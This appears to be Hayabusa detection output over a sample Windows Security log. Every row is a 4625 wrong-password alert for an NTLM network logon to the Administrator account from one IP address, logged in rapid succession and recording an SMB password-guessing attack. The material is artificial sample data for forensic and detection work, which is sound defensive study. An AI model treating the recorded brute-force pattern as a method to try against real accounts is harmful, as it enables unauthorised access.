2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q9sN5xm3GytfmM7G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FtQQS61GYBm6WUUz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3WxxawZZMhNCGHxc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sKP8G2VgJlrr9LMR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VvOsNQpk3c5p1FgK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H7oz7NPh5Z8UrDPW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VvzNFOLBlBv98Do4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8KJmYytO30Icc6Rb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zro3jLjFXWZ2o8VL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Z2J8VYeuxd9fKcG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pXMjOKLfMex7OmMv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cgbm3YeoGxCa22Il  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b7MEstBFjiWhVE18  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y8Y2kDEiMZWf0znn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zBAFVgPIOyCvtdRs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s3pFhUcspF6lzQXN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 39LFXXW715pQoADC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: in4ewyxouUnxQzCQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zOtV8CLIU6Mcw2ty  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b8NJqimhGrg9uhTh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XEWLTOY9magV0h6L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Di1MZsJx52Bi8E6k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 22MdB2QodynfibkF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Qojej3YITXvXJ6Pe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CLjbQ6timbdQoufd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aZgoAnGEFwXN88bQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NZFWoL9XUMJdfNnY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x000TRnXfVtPAQSE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HNHWWHDOpXQyNdrR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1irbPdOoUfvq1MXd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dCflbKOMPJRXQHsD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zuy6nD4EXeGzEy5e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xkig4u0LIS9v3HMK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 94RbUrUcMf6VhP8A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X9f7wCJ3wI9RmZTL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LkVs1viGo4RxhFaY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OKMLt6t01vUDDq1s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xYSif8ADOkC8aInB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EpmraSe2sxFVupTy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VPtfy3AxXpt9D3bx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tRMOrE0Ba983q0Jv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jQ0nkyTAeJt3dCpx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n2fdsRMU9SMm1KpL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3kliEPBsbsYNI7yG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9gEKFGsRvvlzulxR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5M6oUbT8LvS7JNCq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E4dxHwRQVR7iBWa1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VRygirU257VfFcR5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6H6i0wkjvWkU6cmp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W4Nh7bYfVvx30hVF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GQEsO4GpVjO5xpRh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c9ZlpSBwq0tLAgzm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 65Piip53B1AiSBqb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bh7SfuheoykW7Aym  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tWdm76C4nL6tkU0Z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u2WEqTrg3A760Axt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oyqhXspTlWwVCwA3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4rkidbQJmvQr35Jg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zr92VsL1YgHVehnL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rQP1K9rHrOyL0TOc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LR783q3o34oLQLTI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6NCTNhcghRGWf1qi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CVJdStLdKDbUICyB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: luAoVhEj1rOgZBfp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OrqmovxoEEjLCaYV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AIP4mDSVhM27IAIP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cym5lXDK01XuJz2b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7pYXA1Ic6BOfG31o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b722QrTSVoZGfiK8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NzRFz4L7dpar794B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pLWuw9eMN9rqm0Ic  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sE7pzfiKRfOb2dH5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YxL1cV8OiFVRfj4I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
